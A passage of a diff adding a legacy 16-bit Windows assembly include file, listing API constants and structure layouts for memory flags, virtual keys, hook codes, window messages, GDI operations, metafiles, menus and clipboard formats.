+GMEM_MODIFY = 0080h
+GMEM_DISCARDABLE= 0100h
+GMEM_NOT_BANKED = 1000h
+GMEM_DDESHARE = 2000h
+GMEM_SHARE = 2000h
+GMEM_NOTIFY = 4000h
+GMEM_LOWER = GMEM_NOT_BANKED
+GHND = GMEM_MOVEABLE+GMEM_ZEROINIT
+GPTR = GMEM_FIXED+GMEM_ZEROINIT
+
+; Flags returned by GlobalFlags (in addition to GMEM_DISCARDABLE)
+GMEM_DISCARDED = 4000h
+GMEM_LOCKCOUNT = 00FFh
+
+; Flags returned by GetWinFlags
+
+WF_PMODE = 0001h
+WF_CPU286 = 0002h
+WF_CPU386 = 0004h
+WF_CPU486 = 0008h
+WF_STANDARD = 0010h
+WF_WIN286 = 0010h
+WF_ENHANCED = 0020h
+WF_WIN386 = 0020h
+WF_CPU086 = 0040h
+WF_CPU186 = 0080h
+WF_LARGEFRAME = 0100h
+WF_SMALLFRAME = 0200h
+WF_80x87 = 0400h 
+WF_PAGING = 0800h +WF_WLO = 8000h + +; WEP fSystemExit flag values +WEP_SYSTEM_EXIT = 1 +WEP_FREE_DLL = 0 + + +; Virtual Keys, Standard Set + +IFNDEF NOVK +VK_LBUTTON = 01H +VK_RBUTTON = 02H +VK_CANCEL = 03H +VK_BACK = 08H +VK_TAB = 09H +VK_CLEAR = 0cH +VK_RETURN = 0dH +VK_SHIFT = 10H +VK_CONTROL = 11H +VK_MENU = 12H +VK_PAUSE = 13H +VK_CAPITAL = 14H +VK_ESCAPE = 1bH +VK_SPACE = 20H + +VK_PRIOR = 21H +VK_NEXT = 22H +VK_END = 23H +VK_HOME = 24H +VK_LEFT = 25H +VK_UP = 26H +VK_RIGHT = 27H +VK_DOWN = 28H + +; VK_A thru VK_Z are the same as their ASCII equivalents: 'A' thru 'Z' +; VK_0 thru VK_9 are the same as their ASCII equivalents: '0' thru '0' + +VK_PRINT = 2aH +VK_EXECUTE = 2bH +VK_SNAPSHOT = 2ch ; Printscreen key.. +VK_INSERT = 2dH +VK_DELETE = 2eH +VK_HELP = 2fH + +VK_NUMPAD0 = 60H +VK_NUMPAD1 = 61H +VK_NUMPAD2 = 62H +VK_NUMPAD3 = 63H +VK_NUMPAD4 = 64H +VK_NUMPAD5 = 65H +VK_NUMPAD6 = 66H +VK_NUMPAD7 = 67H +VK_NUMPAD8 = 68H +VK_NUMPAD9 = 69H +VK_MULTIPLY = 6AH +VK_ADD = 6BH +VK_SEPARATER = 6CH +VK_SUBTRACT = 6DH +VK_DECIMAL = 6EH +VK_DIVIDE = 6FH + +VK_F1 = 70H +VK_F2 = 71H +VK_F3 = 72H +VK_F4 = 73H +VK_F5 = 74H +VK_F6 = 75H +VK_F7 = 76H +VK_F8 = 77H +VK_F9 = 78H +VK_F10 = 79H +VK_F11 = 7aH +VK_F12 = 7bH +VK_F13 = 7cH +VK_F14 = 7dH +VK_F15 = 7eH +VK_F16 = 7fH +VK_F17 = 80H +VK_F18 = 81H +VK_F19 = 82H +VK_F20 = 83H +VK_F21 = 84H +VK_F22 = 85H +VK_F23 = 86H +VK_F24 = 87H + +VK_NUMLOCK = 90H +VK_SCROLL = 91H +ENDIF + +IFNDEF NOWH + +; SetWindowsHook() codes +WH_MSGFILTER = (-1) +WH_JOURNALRECORD = 0 +WH_JOURNALPLAYBACK = 1 +WH_KEYBOARD = 2 +WH_GETMESSAGE = 3 +WH_CALLWNDPROC = 4 +IFNDEF NOWIN31 +WH_CBT = 5 +WH_SYSMSGFILTER = 6 +WH_MOUSE = 7 +WH_HARDWARE = 8 +WH_DEBUG = 9 +ENDIF +; +; Hook Codes +HC_GETLPLPFN = (-3) +HC_LPLPFNNEXT = (-2) +HC_LPFNNEXT = (-1) +HC_ACTION = 0 +HC_GETNEXT = 1 +HC_SKIP = 2 +HC_NOREM = 3 +HC_NOREMOVE = 3 +HC_SYSMODALON = 4 +HC_SYSMODALOFF = 5 +; +; CBT Hook Codes +HCBT_MOVESIZE = 0 +HCBT_MINMAX = 1 +HCBT_QS = 2 +HCBT_CREATEWND = 3 
+HCBT_DESTROYWND = 4 +HCBT_ACTIVATE = 5 +HCBT_CLICKSKIPPED = 6 +HCBT_KEYSKIPPED = 7 +HCBT_SYSCOMMAND = 8 +HCBT_SETFOCUS = 9 + +; +; WH_MSGFILTER Filter Proc Codes +MSGF_DIALOGBOX = 0 +MSGF_MENU = 2 +MSGF_MOVE = 3 +MSGF_SIZE = 4 +MSGF_SCROLLBAR = 5 +MSGF_NEXTWINDOW = 6 +; +; Window Manager Hook Codes +WC_INIT = 1 +WC_SWP = 2 +WC_DEFWINDOWPROC = 3 +WC_MINMAX = 4 +WC_MOVE = 5 +WC_SIZE = 6 +WC_DRAWCAPTION = 7 +; + +; Message Structure used in Journaling +EVENTMSG struc + message dw ? + paramL dw ? + paramH dw ? + time dd ? +EVENTMSG ends + +ENDIF ;NOWH + +; Window field offsets for GetWindowLong() and GetWindowWord() +GWL_WNDPROC = (-4) +GWW_HINSTANCE = (-6) +GWW_HWNDPARENT = (-8) +GWW_ID = (-12) +GWL_STYLE = (-16) +GWL_EXSTYLE = (-20) + +; GetWindow() Constants +GW_HWNDFIRST = 0 +GW_HWNDLAST = 1 +GW_HWNDNEXT = 2 +GW_HWNDPREV = 3 +GW_OWNER = 4 +GW_CHILD = 5 + +; Class field offsets for GetClassLong() and GetClassWord() +GCL_MENUNAME = (-8) +GCW_HBRBACKGROUND = (-10) +GCW_HCURSOR = (-12) +GCW_HICON = (-14) +GCW_HMODULE = (-16) +GCW_CBWNDEXTRA = (-18) +GCW_CBCLSEXTRA = (-20) +GCL_WNDPROC = (-24) +GCW_STYLE = (-26) + +; WinWhere() Area Codes +HTERROR = (-2) +HTTRANSPARENT = (-1) +HTNOWHERE = 0 +HTCLIENT = 1 +HTCAPTION = 2 +HTSYSMENU = 3 +HTGROWBOX = 4 +HTSIZE = HTGROWBOX +HTMENU = 5 +HTHSCROLL = 6 +HTVSCROLL = 7 +HTREDUCE = 8 +HTZOOM = 9 +HTLEFT = 10 +HTRIGHT = 11 +HTTOP = 12 +HTTOPLEFT = 13 +HTTOPRIGHT = 14 +HTBOTTOM = 15 +HTBOTTOMLEFT = 16 +HTBOTTOMRIGHT = 17 +HTSIZEFIRST = HTLEFT +HTSIZELAST = HTBOTTOMRIGHT + + + +;************************************************************************* +; +; Misc structures & constants +; +;************************************************************************* + +IFNDEF NOMST +POINT struc + ptX dw ? + ptY dw ? +POINT ends + +LOGPEN struc + lopnStyle dw ? + lopnWidth db (SIZE POINT) DUP(?) + lopnColor dd ? +LOGPEN ends + + +BITMAP STRUC + bmType DW ? + bmWidth DW ? + bmHeight DW ? + bmWidthBytes DW ? + bmPlanes DB ? 
+ bmBitsPixel DB ? + bmBits DD ? +BITMAP ENDS + +RGBTRIPLE struc + rgbBlue db ? + rgbGreen db ? + rgbRed db ? +RGBTRIPLE ends + +RGBQUAD struc + rgbqBlue db ? + rgbqGreen db ? + rgbqRed db ? + rgbqReserved db ? +RGBQUAD ends + +; structures for defining DIBs +BITMAPCOREHEADER struc + bcSize dd ? + bcWidth dw ? + bcHeight dw ? + bcPlanes dw ? + bcBitCount dw ? +BITMAPCOREHEADER ends + +BITMAPINFOHEADER struc + biSize dd ? + biWidth dd ? + biHeight dd ? + biPlanes dw ? + biBitCount dw ? + + biCompression dd ? + biSizeImage dd ? + biXPelsPerMeter dd ? + biYPelsPerMeter dd ? + biClrUsed dd ? + biClrImportant dd ? +BITMAPINFOHEADER ends + +BITMAPINFO struc + bmiHeader db (SIZE BITMAPINFOHEADER) DUP (?) + bmiColors db ? ; array of RGBQUADs +BITMAPINFO ends + +BITMAPCOREINFO struc + bmciHeader db (SIZE BITMAPCOREHEADER) DUP (?) + bmciColors db ? ; array of RGBTRIPLEs +BITMAPCOREINFO ends + +BITMAPFILEHEADER struc + bfType dw ? + bfSize dd ? + bfReserved1 dw ? + bfReserved2 dw ? + bfOffBits dd ? +BITMAPFILEHEADER ends + + +WNDSTRUC struc + WSwndStyle dd ? + WSwndID dw ? + WSwndText dw ? + WSwndParent dw ? + WSwndInstance dw ? + WSwndClassProc dd ? +WNDSTRUC ends +; +; Message structure +; +MSGSTRUCT struc +msHWND dw ? +msMESSAGE dw ? +msWPARAM dw ? +msLPARAM dd ? +msTIME dd ? +msPT dd ? +MSGSTRUCT ends + +NEWPARMS struc + nprmHwnd dw ? + nprmCmd db ? +NEWPARMS ends +ENDIF + +PAINTSTRUCT STRUC + PShdc DW ? + PSfErase DW ? + PSrcPaint DB size RECT dup(?) + PSfRestore DW ? + PSfIncUpdate DW ? + PSrgbReserved DB 16 dup(?) +PAINTSTRUCT ENDS + + +CREATESTRUCT struc + cs_lpCreateParams dd ? + cs_hInstance dw ? + cs_hMenu dw ? + cs_hwndParent dw ? + cs_cy dw ? + cs_cx dw ? + cs_y dw ? + cs_x dw ? + cs_style dd ? + cs_lpszName dd ? + cs_lpszClass dd ? + cs_dwExStyle dd ? 
+CREATESTRUCT ends +; +; PostError constants +; +WARNING = 0 ; command codes +MINOR_ERROR = 1 +FATAL_ERROR = 2 + +IGNORE = 0 ; response codes +RETRY = 1 +ABORT = 2 +; +; GDI-related constants & commands +; +ERRORREGION = 0 +NULLREGION = 1 +SIMPLEREGION = 2 +COMPLEXREGION = 3 + +IFNDEF NORASTOPS +; +; Binary raster ops +; +R2_BLACK = 1 +R2_NOTMERGEPEN = 2 +R2_MASKNOTPEN = 3 +R2_NOTCOPYPEN = 4 +R2_MASKPENNOT = 5 +R2_NOT = 6 +R2_XORPEN = 7 +R2_NOTMASKPEN = 8 +R2_MASKPEN = 9 +R2_NOTXORPEN = 10 +R2_NOP = 11 +R2_MERGENOTPEN = 12 +R2_COPYPEN = 13 +R2_MERGEPENNOT = 14 +R2_MERGEPEN = 15 +R2_WHITE = 16 +; +; Ternary raster ops +; +SRCCOPY_L = 0020h ;dest=source +SRCCOPY_H = 00CCh +SRCPAINT_L = 0086h ;dest=source OR dest +SRCPAINT_H = 00EEh +SRCAND_L = 00C6h ;dest=source AND dest +SRCAND_H = 0088h +SRCINVERT_L = 0046h ;dest= source XOR dest +SRCINVERT_H = 0066h +SRCERASE_L = 0328h ;dest= source AND (not dest ) +SRCERASE_H = 0044h +NOTSRCCOPY_L = 0008h ;dest= (not source) +NOTSRCCOPY_H = 0033h +NOTSRCERASE_L = 00A6h ;dest= (not source) AND (not dest) +NOTSRCERASE_H = 0011h +MERGECOPY_L = 00CAh ;dest= (source AND pattern) +MERGECOPY_H = 00C0h +MERGEPAINT_L = 0226h ;dest= (source AND pattern) OR dest +MERGEPAINT_H = 00BBh +PATCOPY_L = 0021h ;dest= pattern +PATCOPY_H = 00F0h +PATPAINT_L = 0A09h ;DPSnoo +PATPAINT_H = 00FBh +PATINVERT_L = 0049h ;dest= pattern XOR dest +PATINVERT_H = 005Ah +DSTINVERT_L = 0009h ;dest= (not dest) +DSTINVERT_H = 0055h +BLACKNESS_L = 0042h ;dest= BLACK +BLACKNESS_H = 0000h +WHITENESS_L = 0062h ;dest= WHITE +WHITENESS_H = 00FFh +; +; StretchBlt modes +; +BLACKONWHITE = 1 +WHITEONBLACK = 2 +COLORONCOLOR = 3 +; +; New StretchBlt modes +; +STRETCH_ANDSCANS = 1 +STRETCH_ORSCANS = 2 +STRETCH_DELETESCANS = 3 +; +; PolyFill modes +; +ALTERNATE = 1 +WINDING = 2 +ENDIF +; +; Text Alignment Options +; +TA_NOUPDATECP = 0 +TA_UPDATECP = 1 + +TA_LEFT = 0 +TA_RIGHT = 2 +TA_CENTER = 6 + +TA_TOP = 0 +TA_BOTTOM = 8 +TA_BASELINE = 24 + +ETO_GRAYED = 1 +ETO_OPAQUE = 2 
+ETO_CLIPPED = 4 + +ASPECT_FILTERING = 1 + +ifndef NOMETAFILE + +; Metafile Functions */ +META_SETBKCOLOR = 0201h +META_SETBKMODE = 0102h +META_SETMAPMODE = 0103h +META_SETROP2 = 0104h +META_SETRELABS = 0105h +META_SETPOLYFILLMODE = 0106h +META_SETSTRETCHBLTMODE = 0107h +META_SETTEXTCHAREXTRA = 0108h +META_SETTEXTCOLOR = 0209h +META_SETTEXTJUSTIFICATION = 020Ah +META_SETWINDOWORG = 020Bh +META_SETWINDOWEXT = 020Ch +META_SETVIEWPORTORG = 020Dh +META_SETVIEWPORTEXT = 020Eh +META_OFFSETWINDOWORG = 020Fh +META_SCALEWINDOWEXT = 0400h +META_OFFSETVIEWPORTORG = 0211h +META_SCALEVIEWPORTEXT = 0412h +META_LINETO = 0213h +META_MOVETO = 0214h +META_EXCLUDECLIPRECT = 0415h +META_INTERSECTCLIPRECT = 0416h +META_ARC = 0817h +META_ELLIPSE = 0418h +META_FLOODFILL = 0419h +META_PIE = 081Ah +META_RECTANGLE = 041Bh +META_ROUNDRECT = 061Ch +META_PATBLT = 061Dh +META_SAVEDC = 001Eh +META_SETPIXEL = 041Fh +META_OFFSETCLIPRGN = 0220h +META_TEXTOUT = 0521h +META_BITBLT = 0922h +META_STRETCHBLT = 0B23h +META_POLYGON = 0324h +META_POLYLINE = 0325h +META_ESCAPE = 0626h +META_RESTOREDC = 0127h +META_FILLREGION = 0228h +META_FRAMEREGION = 0429h +META_INVERTREGION = 012Ah +META_PAINTREGION = 012Bh +META_SELECTCLIPREGION = 012Ch +META_SELECTOBJECT = 012Dh +META_SETTEXTALIGN = 012Eh +META_DRAWTEXT = 062Fh + +META_CHORD = 0830h +META_SETMAPPERFLAGS = 0231h +META_EXTTEXTOUT = 0a32h +META_SETDIBTODEV = 0d33h +META_SELECTPALETTE = 0234h +META_REALIZEPALETTE = 0035h +META_ANIMATEPALETTE = 0436h +META_SETPALENTRIES = 0037h +META_POLYPOLYGON = 0538h +META_RESIZEPALETTE = 0139h + +META_DIBBITBLT = 0940h +META_DIBSTRETCHBLT = 0b41h +META_DIBCREATEPATTERNBRUSH = 0142h +META_STRETCHDIB = 0f43h + +META_DELETEOBJECT = 01f0h + +META_CREATEPALETTE = 00f7h +META_CREATEBRUSH = 00F8h +META_CREATEPATTERNBRUSH = 01F9h +META_CREATEPENINDIRECT = 02FAh +META_CREATEFONTINDIRECT = 02FBh +META_CREATEBRUSHINDIRECT = 02FCh +META_CREATEBITMAPINDIRECT = 02FDh +META_CREATEBITMAP = 06FEh +META_CREATEREGION = 06FFh + +; /* 
Clipboard Metafile Picture Structure */ +HANDLETABLE struc + ht_objectHandle dw ? +HANDLETABLE ends + +METARECORD struc + mr_rdSize dd ? + mr_rdFunction dw ? + mr_rdParm dw ? +METARECORD ends + +METAFILEPICT struc + mfp_mm dw ? + mfp_xExt dw ? + mfp_yExt dw ? + mfp_hMF dw ? +METAFILEPICT ends + +METAHEADER struc + mtType dw ? + mtHeaderSize dw ? + mtVersion dw ? + mtSize dd ? + mtNoObjects dw ? + mtMaxRecord dd ? + mtNoParameters dw ? +METAHEADER ends + +endif ; NOMETAFILE + +; GDI Escapes +NEWFRAME = 1 +ABORTDOC = 2 +NEXTBAND = 3 +SETCOLORTABLE = 4 +GETCOLORTABLE = 5 +FLUSHOUTPUT = 6 +DRAFTMODE = 7 +QUERYESCSUPPORT = 8 +SETABORTPROC = 9 +STARTDOC = 10 +;; This value conflicts with a std WIN386 MACRO definition +;;ENDDOC = 11 +GETPHYSPAGESIZE = 12 +GETPRINTINGOFFSET = 13 +GETSCALINGFACTOR = 14 +MFCOMMENT = 15 +GETPENWIDTH = 16 +SETCOPYCOUNT = 17 +SELECTPAPERSOURCE = 18 +DEVICEDATA = 19 +PASSTHROUGH = 19 +GETTECHNOLGY = 20 +GETTECHNOLOGY = 20 +SETENDCAP = 21 +SETLINEJOIN = 22 +SETMITERLIMIT = 23 +BANDINFO = 24 +DRAWPATTERNRECT = 25 +GETVECTORPENSIZE = 26 +GETVECTORBRUSHSIZE = 27 +ENABLEDUPLEX = 28 +ENABLEMANUALFEED = 29 +GETSETPAPERBINS = 29 +GETSETPRINTORIENT = 30 +ENUMPAPERBINS = 31 + +GETEXTENDEDTEXTMETRICS = 256 +GETEXTENTTABLE = 257 +GETPAIRKERNTABLE = 258 +GETTRACKKERNTABLE = 259 + +EXTTEXTOUT = 512 + +ENABLERELATIVEWIDTHS = 768 +ENABLEPAIRKERNING = 769 +SETKERNTRACK = 770 +SETALLJUSTVALUES = 771 +SETCHARSET = 772 + +GETSETSCREENPARAMS = 3072 + +STRETCHBLT = 2048 + + +; Spooler Error Codes +SP_NOTREPORTED = 4000h +SP_ERROR = (-1) +SP_APPABORT = (-2) +SP_USERABORT = (-3) +SP_OUTOFDISK = (-4) +SP_OUTOFMEMORY = (-5) + +PR_JOBSTATUS = 0000 + +; Object Definitions for EnumObjects() +OBJ_PEN = 1 +OBJ_BRUSH = 2 + +; +; Menu flags for Change/Check/Enable MenuItem +; +MF_INSERT = 0000h +MF_CHANGE = 0080h +MF_APPEND = 0100h +MF_DELETE = 0200h +MF_REMOVE = 1000h + +MF_BYCOMMAND = 0000h +MF_BYPOSITION = 0400h + +MF_SEPARATOR = 0800h + +MF_ENABLED = 0000h +MF_GRAYED = 
0001h +MF_DISABLED = 0002h + +MF_UNCHECKED = 0000h +MF_CHECKED = 0008h +MF_USECHECKBITMAPS= 0200h + +MF_STRING = 0000h +MF_BITMAP = 0004h +MF_OWNERDRAW = 0100h + +MF_POPUP = 0010h +MF_MENUBARBREAK = 0020h +MF_MENUBREAK = 0040h + +MF_UNHILITE = 0000h +MF_HILITE = 0080h + +MF_SYSMENU = 2000h +MF_HELP = 4000h +MF_MOUSESELECT = 8000h + + +; +; System Menu Command Values +; +SC_SIZE = 0F000h +SC_MOVE = 0F010h +SC_MINIMIZE = 0F020h +SC_MAXIMIZE = 0F030h +SC_NEXTWINDOW = 0F040h +SC_PREVWINDOW = 0F050h +SC_CLOSE = 0F060h +SC_VSCROLL = 0F070h +SC_HSCROLL = 0F080h +SC_MOUSEMENU = 0F090h +SC_KEYMENU = 0F100h +SC_ARRANGE = 0F110h +SC_RESTORE = 0F120h +SC_TASKLIST = 0F130h +SC_SCREENSAVE = 0F140h +SC_HOTKEY = 0F150h + +SC_ICON = SC_MINIMIZE +SC_ZOOM = SC_MAXIMIZE + +; +; Window State Messages +; +IFNDEF NOWM +WM_STATE = 0000H + +WM_NULL = 0000h +WM_CREATE = 0001h +WM_DESTROY = 0002h +WM_MOVE = 0003h +WM_SIZE = 0005h +WM_ACTIVATE = 0006h +WM_SETFOCUS = 0007h +WM_KILLFOCUS = 0008h +WM_ENABLE = 000Ah +WM_SETREDRAW = 000Bh +WM_SETTEXT = 000Ch +WM_GETTEXT = 000Dh +WM_GETTEXTLENGTH = 000Eh +WM_PAINT = 000Fh +WM_CLOSE = 0010h +WM_QUERYENDSESSION = 0011h +WM_QUIT = 0012h +WM_QUERYOPEN = 0013h +WM_ERASEBKGND = 0014h +WM_SYSCOLORCHANGE = 0015h +WM_ENDSESSION = 0016h +WM_SYSTEMERROR = 0017h +WM_SHOWWINDOW = 0018h +WM_CTLCOLOR = 0019h +WM_WININICHANGE = 001Ah +WM_DEVMODECHANGE = 001Bh +WM_ACTIVATEAPP = 001Ch +WM_FONTCHANGE = 001Dh +WM_TIMECHANGE = 001Eh +WM_CANCELMODE = 001Fh +WM_SETCURSOR = 0020h +WM_MOUSEACTIVATE = 0021h +WM_CHILDACTIVATE = 0022h +WM_QUEUESYNC = 0023h +WM_GETMINMAXINFO = 0024h +WM_PAINTICON = 0026h +WM_ICONERASEBKGND = 0027h +WM_NEXTDLGCTL = 0028h +WM_SPOOLERSTATUS = 002Ah +WM_DRAWITEM = 002Bh +WM_MEASUREITEM = 002Ch +WM_DELETEITEM = 002Dh +WM_VKEYTOITEM = 002Eh +WM_CHARTOITEM = 002Fh +WM_SETFONT = 0030h +WM_GETFONT = 0031h +WM_QUERYDRAGICON = 0037h +WM_COMPAREITEM = 0039h +WM_COMPACTING = 0041h +IFNDEF NOWIN31 +WM_COMMNOTIFY = 0044h +WM_WINDOWPOSCHANGING= 0046h 
+WM_WINDOWPOSCHANGED = 0047h +WM_POWER = 0048h +ENDIF + + +WM_NCCREATE = 0081h +WM_NCDESTROY = 0082h +WM_NCCALCSIZE = 0083h +WM_NCHITTEST = 0084h +WM_NCPAINT = 0085h +WM_NCACTIVATE = 0086h +WM_GETDLGCODE = 0087h +WM_NCMOUSEMOVE = 00A0h +WM_NCLBUTTONDOWN = 00A1h +WM_NCLBUTTONUP = 00A2h +WM_NCLBUTTONDBLCLK = 00A3h +WM_NCRBUTTONDOWN = 00A4h +WM_NCRBUTTONUP = 00A5h +WM_NCRBUTTONDBLCLK = 00A6h +WM_NCMBUTTONDOWN = 00A7h +WM_NCMBUTTONUP = 00A8h +WM_NCMBUTTONDBLCLK = 00A9h + +WM_KEYFIRST = 0100h +WM_KEYDOWN = 0100h +WM_KEYUP = 0101h +WM_CHAR = 0102h +WM_DEADCHAR = 0103h +WM_SYSKEYDOWN = 0104h +WM_SYSKEYUP = 0105h +WM_SYSCHAR = 0106h +WM_SYSDEADCHAR = 0107h +WM_KEYLAST = 0108h + +WM_INITDIALOG = 0110h +WM_COMMAND = 0111h +WM_SYSCOMMAND = 0112h +WM_TIMER = 0113h +WM_HSCROLL = 0114h +WM_VSCROLL = 0115h +WM_INITMENU = 0116h +WM_INITMENUPOPUP = 0117h +WM_MENUSELECT = 011Fh +WM_MENUCHAR = 0120h +WM_ENTERIDLE = 0121h + + +WM_MOUSEFIRST = 0200h +WM_MOUSEMOVE = 0200h +WM_LBUTTONDOWN = 0201h +WM_LBUTTONUP = 0202h +WM_LBUTTONDBLCLK = 0203h +WM_RBUTTONDOWN = 0204h +WM_RBUTTONUP = 0205h +WM_RBUTTONDBLCLK = 0206h +WM_MBUTTONDOWN = 0207h +WM_MBUTTONUP = 0208h +WM_MBUTTONDBLCLK = 0209h +WM_MOUSELAST = 0209h + +WM_PARENTNOTIFY = 0210h +WM_MDICREATE = 0220h +WM_MDIDESTROY = 0221h +WM_MDIACTIVATE = 0222h +WM_MDIRESTORE = 0223h +WM_MDINEXT = 0224h +WM_MDIMAXIMIZE = 0225h +WM_MDITILE = 0226h +WM_MDICASCADE = 0227h +WM_MDIICONARRANGE = 0228h +WM_MDIGETACTIVE = 0229h +WM_MDISETMENU = 0230h +WM_DROPFILES = 0233h + + +WM_CUT = 0300h +WM_COPY = 0301h +WM_PASTE = 0302h +WM_CLEAR = 0303h +WM_UNDO = 0304h +WM_RENDERFORMAT = 0305h +WM_RENDERALLFORMATS = 0306h +WM_DESTROYCLIPBOARD = 0307h +WM_DRAWCLIPBOARD = 0308h +WM_PAINTCLIPBOARD = 0309h +WM_VSCROLLCLIPBOARD = 030Ah +WM_SIZECLIPBOARD = 030Bh +WM_ASKCBFORMATNAME = 030Ch +WM_CHANGECBCHAIN = 030Dh +WM_HSCROLLCLIPBOARD = 030Eh +WM_QUERYNEWPALETTE = 030Fh +WM_PALETTEISCHANGING = 0310h +WM_PALETTECHANGED = 0311h + +IFNDEF NOWIN31 +WM_PENWINFIRST equ 0380h 
+WM_PENWINLAST equ 038Fh + + +WM_COALESCE_FIRST equ 0390h +WM_COALESCE_LAST equ 039Fh + + + + +ENDIF + + + +; private window messages start here +WM_USER = 0400H +ENDIF ; NOWM + +; WM_MOUSEACTIVATE Return Codes +MA_ACTIVATE = 1 +MA_ACTIVATEANDEAT = 2 +MA_NOACTIVATE = 3 + +; Size message commands +SIZENORMAL = 0 +SIZEICONIC = 1 +SIZEFULLSCREEN = 2 +SIZEZOOMSHOW = 3 +SIZEZOOMHIDE = 4 + +; ShowWindow() Commands +SW_HIDE = 0 +SW_SHOWNORMAL = 1 +SW_NORMAL = 1 +SW_SHOWMINIMIZED = 2 +SW_SHOWMAXIMIZED = 3 +SW_MAXIMIZE = 3 +SW_SHOWNOACTIVATE = 4 +SW_SHOW = 5 +SW_MINIMIZE = 6 +SW_SHOWMINNOACTIVE = 7 +SW_SHOWNA = 8 +SW_RESTORE = 9 + +; Old ShowWindow() Commands +HIDE_WINDOW = 0 +SHOW_OPENWINDOW = 1 +SHOW_ICONWINDOW = 2 +SHOW_FULLSCREEN = 3 +SHOW_OPENNOACTIVATE= 4 + +; identifiers for the WM_SHOWWINDOW message +SW_PARENTCLOSING = 1 +SW_OTHERZOOM = 2 +SW_PARENTOPENING = 3 +SW_OTHERUNZOOM = 4 +; +; Key state masks for mouse messages +; +MK_LBUTTON = 0001h +MK_RBUTTON = 0002h +MK_SHIFT = 0004h +MK_CONTROL = 0008h +MK_MBUTTON = 0010h +; +; Class styles +; +CS_VREDRAW = 0001h +CS_HREDRAW = 0002h +CS_KEYCVTWINDOW = 0004H +CS_DBLCLKS = 0008h +; 0010h reserved +CS_OWNDC = 0020h +CS_CLASSDC = 0040h +CS_PARENTDC = 0080h +CS_NOKEYCVT = 0100h +CS_SAVEBITS = 0800h +CS_NOCLOSE = 0200h +CS_BYTEALIGNCLIENT = 1000h +CS_BYTEALIGNWINDOW = 2000h +CS_GLOBALCLASS = 4000h ; Global window class + +; +; Special CreateWindow position value +; +CW_USEDEFAULT EQU 8000h + +; +; Windows styles (the high words) +; +WS_OVERLAPPED = 00000h +WS_ICONICPOPUP = 0C000h +WS_POPUP = 08000h +WS_CHILD = 04000h +WS_MINIMIZE = 02000h +WS_VISIBLE = 01000h +WS_DISABLED = 00800h +WS_CLIPSIBLINGS = 00400h +WS_CLIPCHILDREN = 00200h +WS_MAXIMIZE = 00100h +WS_CAPTION = 000C0h ; WS_BORDER | WS_DLGFRAME +WS_BORDER = 00080h +WS_DLGFRAME = 00040h +WS_VSCROLL = 00020h +WS_HSCROLL = 00010h +WS_SYSMENU = 00008h +WS_THICKFRAME = 00004h +WS_HREDRAW = 00002h +WS_VREDRAW = 00001h +WS_GROUP = 00002h +WS_TABSTOP = 00001h +WS_MINIMIZEBOX = 
00002h +WS_MAXIMIZEBOX = 00001h + +; Common Window Styles + +WS_OVERLAPPEDWINDOW = WS_OVERLAPPED + WS_CAPTION + WS_SYSMENU + WS_THICKFRAME + WS_MINIMIZEBOX + WS_MAXIMIZEBOX +WS_POPUPWINDOW = WS_POPUP + WS_BORDER + WS_SYSMENU +WS_CHILDWINDOW = WS_CHILD +WS_TILEDWINDOW = WS_OVERLAPPEDWINDOW + +WS_TILED = WS_OVERLAPPED +WS_ICONIC = WS_MINIMIZE +WS_SIZEBOX = WS_THICKFRAME + +; Extended Window Styles (low words) +WS_EX_DLGMODALFRAME = 0001 +WS_EX_DRAGOBJECT = 0002 +WS_EX_NOPARENTNOTIFY = 0004 +WS_EX_TOPMOST = 0008 + +; +; predefined clipboard formats +; +CF_TEXT = 1 +CF_BITMAP = 2 +CF_METAFILEPICT = 3 +CF_SYLK = 4 +CF_DIF = 5 +CF_TIFF = 6 +CF_OEMTEXT = 7 +CF_DIB = 8 +CF_PALETTE = 9 +CF_PENDATA = 10 +CF_RIFF = 11 +CF_WAVE = 12 + +CF_OWNERDISPLAY = 80h ; owner display +CF_DSPTEXT = 81h ; display text +CF_DSPBITMAP = 82h ; display bitmap +CF_DSPMETAFILEPICT = 83h ; display metafile +; +; Private clipboard format range +; +CF_PRIVATEFIRST = 200h ; Anything in this range doesn't +CF_PRIVATELAST = 2ffh ; get GlobalFree'd +CF_GDIOBJFIRST = 300h ; Anything in this range gets +CF_GDIOBJLAST = 3ffh ; DeleteObject'ed + + +MAKEINTRESOURCE MACRO a + mov ax,a + xor dx,dx + ENDM +; +; Predefined resource types +; +RT_CURSOR = 1 ; must be passed through MAKEINTRESOURCE +RT_BITMAP = 2 +RT_ICON = 3 +RT_MENU = 4 +RT_DIALOG = 5 +RT_STRING = 6 +RT_FONTDIR = 7 +RT_FONT = 8 +RT_ACCELERATOR = 9 +RT_RCDATA = 10 + +;** NOTE: if any new resource types are introduced above this point, then the +;** value of DIFFERENCE must be changed. +;** (RT_GROUP_CURSOR - RT_CURSOR) must always be equal to DIFFERENCE +;** (RT_GROUP_ICON - RT_ICON) must always be equal to DIFFERENCE + +DIFFERENCE = 11 + +RT_GROUP_CURSOR = RT_CURSOR + DIFFERENCE +RT_GROUP_ICON = RT_ICON + DIFFERENCE + + + +IFNDEF NOMDI +MDICREATESTRUCT struc + szClass dd ? + szTitle dd ? + hOwner dw ? + x dw ? + y dw ? + cxc dw ? + cyc dw ? + style dd ? +MDICREATESTRUCT ends + +CLIENTCREATESTRUCT struc + hWindowMenu dw ? + idFirstChild dw ? 
+CLIENTCREATESTRUCT ends +ENDIF + +; NOMDI + + +PALETTEENTRY struc + peRed db ? + peGreen db ? + peBlue db ? + peFlags db ? +PALETTEENTRY ends + +; Logical Palette +LOGPALETTE struc + palVersion dw ? + palNumEntries dw ? + palPalEntry db ? ; array of PALETTEENTRY +LOGPALETTE ends + +; DRAWITEMSTRUCT for ownerdraw +DRAWITEMSTRUCT struc + drCtlType dw ? + drCtlID dw ? + dritemID dw ? + dritemAction dw ? + dritemState dw ? + drhwndItem dw ? + drhDC dw ? + drrcItem DB size RECT dup(?) + dritemData dd ? +DRAWITEMSTRUCT ends + +; DELETEITEMSTRUCT for ownerdraw +DELETEITEMSTRUCT struc + deCtlType dw ? + deCtlID dw ? + deitemID dw ? + dehwndItem dw ? + deitemData dd ? +DELETEITEMSTRUCT ends + +; MEASUREITEMSTRUCT for ownerdraw +MEASUREITEMSTRUCT struc + meCtlType dw ? + meCtlID dw ? + meitemID dw ? + meitemWidth dw ? + meitemHeight dw ? + meitemData dd ? +MEASUREITEMSTRUCT ends + +; COMPAREITEMSTUCT for ownerdraw sorting +COMPAREITEMSTRUCT struc + coCtlType dw ? + coCtlID dw ? + cohwndItem dw ? + coitemID1 dw ? + coitemData1 dd ? + coitemID2 dw ? + coitemData2 dd ? 
